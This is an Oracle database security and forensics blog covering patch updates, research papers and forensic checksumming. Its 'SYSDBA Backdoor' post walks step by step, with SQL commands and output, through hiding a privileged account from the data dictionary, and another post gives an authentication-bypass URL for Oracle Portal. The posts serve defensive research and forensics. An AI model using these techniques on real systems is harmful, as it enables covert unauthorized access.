Application Server Vulnerability

Paul Wright May 11th, 2008 ~ 18:50 pm

http://www.securityfocus.com/archive/1/491865

In short if an unauthenticated user makes this request:
“http:/site/pls/portal/%0A”
Then they will be able to access this URL
“http://site/dav_portal/portal/”
as though they were authenticated.

Interesting bug i thought.

Also I came across the web site below the other day which has some interesting material on it regarding Oracle Security such as 10g password hashing algorithm written using python http://www.thesprawl.org/infocalypse/index.php?title=Oracle_Authentication#Oracle_7-11_Password_Hashing_Algorithm

For your reference the Oracle 11g hashing algorithm implemented using Python
http://blog.red-database-security.com/2007/09/21/oracle-password-algorithm-11g-poc-code/

11g vulnerabilities ~ more detail

Paul Wright May 5th, 2008 ~ 9:39 am

More details on April 2008 CPU vulnerabilities.
http://www.securityfocus.com/archive/1/491521
http://www.securityfocus.com/archive/1/491522
http://www.securityfocus.com/archive/1/491524
Exploit code may be in the pipeline so check Millw0rm etc. Note that the last two affect 11g as well. The CPU installation has been smoother and more reliable in my experience so should seriously think about installing this especially if your DB needs to restrict privilege to DB users i.e. low privileged users access Oracle directly.
For custom packages it is also worth auditing your PL/SQL packages using plsqlscanner or similar http://www.red-database-security.com/software/plsqlscanner.html
Details about the DB04 vulnerability which I found are available at my publisher’s URL . http://www.dba-oracle.com/forensics/t_forensics_vulnerable.htm

Lateral SQL Injection

Paul Wright April 25th, 2008 ~ 1:03 am

David has released his latest paper which investigates how by changing NLS variables an attacker can inject SQL into functions that do not normally take varchar input e.g. those that accept dates. Also functions that do not take input but that do rely on NLS variables are similarly affected. Lateral thinking.
Here is the paper http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf and congrats to NGS on winning the SC Security Company of the Year. http://www.scmagazine.com/uk/awards/ and even more congrats to Betfair for winning Queen’s award again. http://www.realbusiness.co.uk/news/international-business/5240271/queens-awards-the-big-winners.thtml

Java Oracle Security

Paul Wright April 22nd, 2008 ~ 19:30 pm

Oracle Middle tier applications usually use Java which is why I have been working on Java Security both at work and for SANS in terms of training at http://www.sans.org/london07/description.php?tid=1517 and presenting http://www.sans.org/sans2008/night.php.
Here are the Powerpoint notes in PDF from my latest presentation javasecurity.pdf given April 22nd at SANS Orlando.

April 2008 CPU

Paul Wright April 15th, 2008 ~ 22:08 pm

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2008.html

April 2008 CPU came out at 9.00pm UK time tonight as normal. Two of the vulnerabilities are ones that I found whilst working at NGS and are both PL/SQL injections but the most critical bug is the JInitiator JVM bug… Java Vulnerabilities are the subject of a Presentation I am giving next week at SANS Orlando http://www.sans.org/sans2008/night.php ..More to come on this subject.

Cheers,
Paul

Checksumming Presentation

Paul Wright March 22nd, 2008 ~ 10:37 am

Hello Folks,
I have just been asked for a copy of the UKOUG presentation I gave in December at Brimingham as the person asking could not find it on UKOUG’s site so here it is. The UKOUG site is being updated so this may explain the current difficulty finding recent papers as the last two year’s conferences were not on there when I looked. In January, I moved work place to the centre of London at Betfair.com. Here is some information about Betfair and Oracle http://www.oracle.com/customers/snapshots/betfair-database-case-study.pdf.
Also this is the Head of our Security Department at Betfair Adrian Asher.

As an aside, for Imperva users out there, I noticed that there is an alert on Bugtraq for Imperva SecureSphere
http://www.securityfocus.com/bid/28279/info . The solution is to upgrade to version 6.0. This is an important upgrade as it fixes a number of problems with version 5.0.

General release of the Oracle Forensics book is in May.
http://www.amazon.com/Oracle-Forensics-Security-Practices-Focus/dp/0977671526
If you want a reviewer’s copy just send me an email to paul@oracleforensics.com

David’s book will also be out this year as well so promising to be an eventful year.
http://www.amazon.com/Oracle-Forensics-Using-Quisix-Litchfield/dp/047019118X

From a general IT Security point of view I think the role of IT Security in the political process is an interesting one and from a strategic level this presentation may provide some relief from Infosec.
http://www.oracle.com/global/uk/citizen-security/speakers.html

My next presentation is at SANS Orlando, with Stephen Northcutt, on Java Security so I had better get back to writing it..

Take care, have a great Easter and don’t forget to set the clocks forward on the 30th.
Paul

AlexK Best of 2007 in English

Paul Wright January 4th, 2008 ~ 23:30 pm

Alex Kornbrust’s Best of Oracle Security Paper 2007 in English. Thanks for the mention Alex.
Also good paper from David on in-memory backdoor.

Research from Arizona University

Paul Wright January 4th, 2008 ~ 12:22 pm

Its good to have time to do some reading. If you are interested in DB forensics I recommend some of the work from Arizona University listed below including a new thesis on the subject of database forensics. http://www.cs.arizona.edu/projects/tau/tbdb/MelindaMalmgrenThesis.pdf
as well as these preceding papers..

Kyri Pavlou and Richard. T. Snodgrass, “The Pre-images of Bitwise AND Functions in Forensic Analysis,'’ TimeCenter TR 87, October, 2006. [.pdf]

Kyri Pavlou and Richard T. Snodgrass, “Forensic Analysis of Database Tampering,” in Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD), pages 109-120, Chicago, June, 2006. (pdf)

Richard T. Snodgrass, Stanley Yao and Christian Collberg, “Tamper Detection in Audit Logs,” In Proceedings of the International Conference on Very Large Databases, Toronto, Canada, August–September 2004, pp. 504–515. (pdf)

Oracle Forensics Book ~ Now Available

Paul Wright December 26th, 2007 ~ 16:35 pm

About time too! Copies available through Rampant Techpress. Author’s copies in the UK can be made available to reviewers by contacting reviewcopy@oracleforensics.com.
Cheers and Merry Christmas 2007bookout2.jpg

SYSDBA Backdoor without direct OS access

Paul Wright December 24th, 2007 ~ 23:35 pm

First half of SYSDBA BACKDOOR paper is easily done without OS access
————————————————————————–
Attacker brute forces a SYSDBA user and wishes to create a user that is hidden from SYS.USER$.
1. CREATE USER
2. GRANT SYSDBA TO USER
3. Rename password file via UTL_FILE.RENAME (requires CREATE DIRECTORY).
4. DROP USER via the DB to lose from SYS.USER$
5. Rename password file back

In detail on 11g Unbreakable Linux:
————————————
First how to get the location and filename of the OS based password file.
By default it is in the same directory as the SPFILE which can be gained as follows.

//get the location
SQL> SELECT value FROM v$parameter WHERE NAME=’spfile’;
VALUE
——————————————————————————–
/home/oracle/app/oracle/product/11.1.0/db_1/dbs/spfileorcl.ora

//get the name of the password file
by default the filename is
PWD.ora (on windows) or
orapw on UNIX.

SQL> select global_name from global_name;
GLOBAL_NAME
——————————————————————————–
ORCL

Therefore attacker can find out the information below:
/home/oracle/app/oracle/product/11.1.0/db_1/dbs/orapworcl

So here we go in SQL*PLUS for demo purposes.

//create the backdoor SYSDBA user.

SQL> create user attacker identified by attacker
2 default tablespace users
3 temporary tablespace temp;
User created.

SQL> GRANT SYSDBA TO attacker;
Grant succeeded.

//remote machine
C:\Documents and Settings\PaulWright>sqlplus attacker/attacker@10.1.1.225/orcl as sysdba
SQL*Plus: Release 10.1.0.4.2 - Production on Fri Dec 21 23:07:08 2007
Copyright (c) 1982, 2005, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.1.0.6.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> show user
USER is “SYS” //backdoor attacker account is working
SQL>

//the account is listed in sys.user$
SQL> SELECT NAME FROM SYS.USER$ ORDER BY NAME;
NAME
——————————
ANONYMOUS
APEX_PUBLIC_USER
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
ATTACKER
AUTHENTICATEDUSER
BI

//attacker gets rid of the sys.user$ entry by first creating a directory to access the password file.
SQL> create directory password_file as ‘/home/oracle/app/oracle/product/11.1.0/db_1/dbs’;
Directory created.

//attacker renames the password file so that the subsequent drop user does not affect the password file
BEGIN
UTL_FILE.FRENAME(’PASSWORD_FILE’, ‘orapworcl’, ‘PASSWORD_FILE’, ‘orapworclBU’, TRUE);
END;
/

//then drops the user
SQL> drop user attacker;
User dropped.

–try to logon as sysdba now fails
C:\Documents and Settings\PaulWright>sqlplus attacker/attacker@10.1.1.225/orcl as sysdba
SQL*Plus: Release 10.1.0.4.2 - Production on Fri Dec 21 23:13:39 2007
Copyright (c) 1982, 2005, Oracle. All rights reserved.
ERROR:
ORA-01031: insufficient privileges
Enter user-name:

–copy back the password file by renaming it to the original name with the overwrite option set to TRUE.
SQL> BEGIN
2 UTL_FILE.FRENAME(’PASSWORD_FILE’, ‘orapworclBU’, ‘PASSWORD_FILE’, ‘orapworcl’, TRUE);
3 END;
4 /

PL/SQL procedure successfully completed.

–attacker no longer in sys.user$ or dba_users but can logon remotely as SYSDBA.
SQL> select name from sys.user$ order by name;
NAME
——————————
ANONYMOUS
APEX_PUBLIC_USER
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
AUTHENTICATEDUSER
BI
BILL

To secure against this first make sure that no one can brute force as SYSDBA(see previous OraBrute paper).
Then regularly check x$ tables and statecheck pwfile as well as oracle binary.
In addition it is generally good security to remove means of accessing OS from DB both via UTL_FILE/Java and restrict the CREATE DIRECTORY privilege.
In terms of forensic investigation the last modified timestamp on the file does not change when it is renamed but the last accessed does (NTFS) but that is for another posting…more to come….and Merry Christmas!

SYSDBA Backdoor

Paul Wright October 14th, 2007 ~ 21:27 pm

New Oracle Security/Forensics paper. http://www.oracleforensics.com/oraclesysdbabackdoor.pdf
This paper is in follow up to Oracle Passwords and OraBrute paper which described the issue of SYSDBA brute forcing in 10g. Subsequent to brute forcing a SYSDBA account an attacker will wish to maintain SYSDBA access in a covert manner such that a DBA or security auditor will not be aware that the attacker has maintained this access over time. Within Oracle databases such as 11g it is a quick and easy task to create a SYSDBA account that is hidden from SYS.USER$, DBA_USERS, V$PWFILE_USERS and GV$PWFILE_USERS so that a user with DBA privileges cannot tell that the hacker’s SYSDBA account is present in the DB. This paper examines such a SYSDBA “backdoor”, proposes defenses and appropriate forensic response with more detail in new Oracle Forensics Book..
book_cover_forensics_255.jpg

http://www.rampant-books.com/book_2007_1_oracle_forensics.htm
This issue affects all supported versions of Oracle’s RDBMS.

Finding Evidence of Data Theft in the Absence of Auditing

Paul Wright August 10th, 2007 ~ 20:06 pm

David Litchfield’s latest paper on Oracle Forensics is available at this URL.
http://www.databasesecurity.com/dbsec/OracleForensicsPt5.pdf

Forensic checksumming on all versions of supported Oracle databases

Paul Wright July 25th, 2007 ~ 1:31 am

Below is an excerpt from my new book on Oracle Forensics which is available through Rampant Techpress and contains both the underlying concepts and advanced practice of Oracle forensics for both incident handling and vulnerability detection. A cornerstone of the book is the need to fully understand the methods that an attacker may use to attack an Oracle server so that the security practitioner can effectively secure the DB and respond effectively to an incident.Excerpt:
Checksums have been used in forensics to verify the state of a piece of code for many years both in terms of Tripwire OS applications and also lists of known good checksums such as those produced at NIST http://www.nsrl.nist.gov/ .
Creating checksums in an Oracle database to verify integrity is pretty straightforward.
DBMS_UTILITY.GET_HASH_VALUE is available on 7, 8, 9, 10 and fast but has different implementation on 7 therefore a different checksum is returned. This is not good for forensic consistency.
DBMS_OBFUSCATION.MD5 is good on 9 and 10 (not 8) and cryptographically stronger than DBMS_UTILITY but slower due to the more complex computation.
DBMS_CRYPTO HASH_SH1 is on 10 only and not fast but the most secure of the three. Additionally, use of MD5 and SHA1 together is not susceptible to malicious use of a collision where two files with differing content have the same checksum. http://www.doxpara.com/md5_someday.pdf. By using stripwire http://www.doxpara.com/stripwire-1.1.tar.gz it is possible for an attacker to control the content of a malicious collision.

However, using both MD5 and SHA1 checksums, dual collisions become all but impossible.

In summary DBMS_UTILITY is useful for checking patches and day to day state checking where speed is important but for higher security MD5 or preferably SHA1 should be used. For very high security purposes it is preferable to check integrity using a combination of both MD5 and SHA1.

Here is an example to check the state of VIEWs in a given schema using SHA1 algorithm:

set wrap off
set linesize 400
set serveroutput on
DROP TABLE SHA1VIEWSTATES
CREATE TABLE SHA1VIEWSTATES(SHA1SCHEMA VARCHAR2(40), SHA1NAME VARCHAR2(40), SHA1CHECKSUM VARCHAR2(40));
CREATE OR REPLACE PROCEDURE SHA1DBVIEWSTATECHECKER(lvschema in varchar2) AS TYPE C_TYPE IS REF CURSOR;
CV C_TYPE;
string varchar2(32767);
l_hash raw(2000);
lvname VARCHAR2(30);
lvtype varchar2(30) :='VIEW';
begin
OPEN CV FOR 'SELECT DISTINCT OBJECT_NAME FROM SYS.DBA_OBJECTS WHERE OBJECT_TYPE=''VIEW'' AND OWNER = :x' using lvschema;
LOOP
FETCH CV INTO lvname;
DBMS_OUTPUT.ENABLE(200000);
l_hash:=dbms_crypto.hash(dbms_metadata.get_ddl(lvtype, lvname, lvschema), dbms_crypto.hash_sh1);
dbms_output.put_line('HashSHA1='||l_hash||' Name='||lvschema||'.'||lvname);
insert into SHA1VIEWSTATES values(lvschema, lvname, l_hash);
EXIT WHEN CV%NOTFOUND;
END LOOP;
CLOSE CV;
end;
/
EXEC SHA1DBVIEWSTATECHECKER('SYS');
SELECT * FROM SHA1VIEWSTATES;

–Carry out again in the future using HA1PACKAGESTATEVIEWSNEW table and compare to the baseline to see if there has been change.
–If both resultsets are identical there should be no result from this query.

(((select * from SHA1PACKAGESTATEVIEWS)minus
(select * from SHA1PACKAGESTATEVIEWSNEW))UNION
((select * from SHA1PACKAGESTATEVIEWSNEW)minus
(select * from SHA1PACKAGESTATEVIEWS)))

I am going go to SANSFIRE now in Washington DC where I will be leading a BoF on Oracle Forensics to launch my new book, Auditing the GCIA for ANSI and testing the new GSEs for SANS/GIAC as well as catching up with some old friends.
Cheers,
Paul
Additional relevant links:
http://eprint.iacr.org/2006/104.pdf
http://web.mit.edu/AFS/sipb/project/fastcoll/
http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip
http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

Catchup

Paul Wright May 20th, 2007 ~ 20:10 pm

Not been blogging for a while due to being busy at work. In the meantime there has been the following.
1.Oracle Audit Vault released by Oracle, but don’t forget to read the trial license…and that goes with many “free” Oracle products interestingly (30 days IOW).
2. Oracle Forensics Live response paper by David. Starts with code that could give the DBA a nasty surprise on reboot. Extends the idea of creating a checksum profile that can be stored and compared at a later time. Checksums for Java Byte code can be made using code in the paper. Additionally David pays reference to a commercial unwrapper for PLSQL. Unwrappers have been around for a while. In order to be forensically sure of a piece of codes effect then the source code needs to be read so an unwrapper will have many positive uses.
3. http://www.ukoug.co.uk/calendar/show_event.jsp?id=2861
is an interesting SIG meeting with a security flavour, though the contents of Pete’s presentation are already online. Professor Carl Dudley’s presentation on TDE is also worth making a journey for.
4. David is giving a very interesting talk at AusCERT. Wish I was there and not just for the sun… as this presentation looks like the current “whats hot”. http://conference.auscert.org.au/conf2007/presentation.php#presentation_TP_04

On a personal side note. If anyone watched the BEEB documentory on Hendrix…small correction needs to be added. Hendrix’s output did not go down hill after Woodstock as Band of Gypsys album which is his most critically acclaimed album by many officianados was on New Years AFTER woodstock.
http://www.amazon.com/Band-Gypsys-Jimi-Hendrix/dp/B000002UVX
Also his influences were largely US soul not the brit pop of the time as the documentary suggest.
http://www.earlyhendrix.com/disco/confir.htm
For a much better Hendrix documentary I recommend “Jimi Hendrix” http://www.imdb.com/title/tt0070242/

April 2007 CPU

Paul Wright April 19th, 2007 ~ 22:06 pm

The April 2007 CPU is out at this URL. It is worth taking a DBState of before the patch and one after to see what has changed as per my GSOC paper.
NGS are the only company with two researchers mentioned and David was first to publish an in-depth analysis of the CPU at this URL
http://www.ngssoftware.com/research/papers/NGSSoftware-OracleCPUAPR2007.pdf
David’s analysis may have been first because he found most of the vulnerabilities including the most critically rated.. and there are plenty more to come..

Oracle Forensics by David Litchfield

Paul Wright April 4th, 2007 ~ 13:48 pm

David Litchfield has released three in-depth papers which will aid a forensic examiner tasked with analysing an Oracle database.
The first paper uncovers the logic behind the structure of the redo logs and the second analyses the structure of the data files whilst the third illustrates how to detect Authentication attacks. This is recommended reading and a significant contribution to the field of Oracle Forensics.

Using Oracle 10g database as a forensics tool

Paul Wright March 29th, 2007 ~ 20:42 pm

As well as carrying out a forensics analysis of an Oracle database I am also interested in using an RDBMS as a tool in a forensics investigation. This link is relevant to that subject.
http://computer.forensikblog.de/en/2006/05/ftk_2_0_will_be_based_on_oracle_database.html

http://www.accessdata.com/media/en_US/press/Press.Oracle_Partnership.en_us.pdf
The pdf above describes using Oracle 10g to handle and sort the data/evidence of many investigations conducted by many analysts with the ability to give the required VIEW privileges to each individual..
..Of course this data will also need to be stored securely which will require some work. The point is that given large amounts of evidence the search tools built in to Oracle will facilitate more efficient pattern identification and forensic analysis.

Oracle Forensics In A Nutshell

Paul Wright March 25th, 2007 ~ 19:23 pm

I have written a short paper to give an overview of the essential basics of Oracle Forensics which will be useful as an introductory crib sheet where time in short supply. Feel free to let me know how best to update the paper. OracleForensicsInANutshell.pdf
This is a taster for the full version available from Rampant Techpress in the near future.
http://www.rampant-books.com/book_2007_1_oracle_forensics.htm
Cheers,
Paul

Oracle SAP legal battle

Paul Wright March 23rd, 2007 ~ 19:23 pm

http://www.securityfocus.com/news/11453
The metalink site is available to all licensed Oracle users and one cannot help but make a copy of a web page when one downloads it BUT offering this on again as third party support is questionable imo ..allegedly.
This case maybe interesting from a forensics perspective because of the question of which geographic legal jurisdiction does this come under? Also if the support pages were regarding RHEL4/Unbreakable Linux then is this infringing Oracle or RedHat. Symbolically this is an interesting battle where the media one-up-manship may become more important than the actual facts of the case. More on the technical side so WTS.

Action to SCN and SCN to time mapping

Paul Wright March 22nd, 2007 ~ 20:57 pm

These two queries should be helpful especially in the absence of a timestamp column: SQL> select ora_rowscn, name from sys.user$;

ORA_ROWSCN NAME
———- ——————————
5072905 SYS
5072905 PUBLIC
5072905 CONNECT
5072905 RESOURCE
5072905 DBA
5072905 SYSTEM
5072905 SELECT_CATALOG_ROLE
5072905 EXECUTE_CATALOG_ROLE
5072905 DELETE_CATALOG_ROLE
5072905 EXP_FULL_DATABASE
5072905 IMP_FULL_DATABASE

SELECT To_Char(TIME_DP,’dd/mm/yyyy hh24:mi:ss’), SCN_BAS FROM SYS.SMON_SCN_TIME;
30/04/2006 10:07:00 9637921
30/04/2006 10:01:53 9637140
30/04/2006 09:56:46 9636359
30/04/2006 09:51:39 9635645

- Next »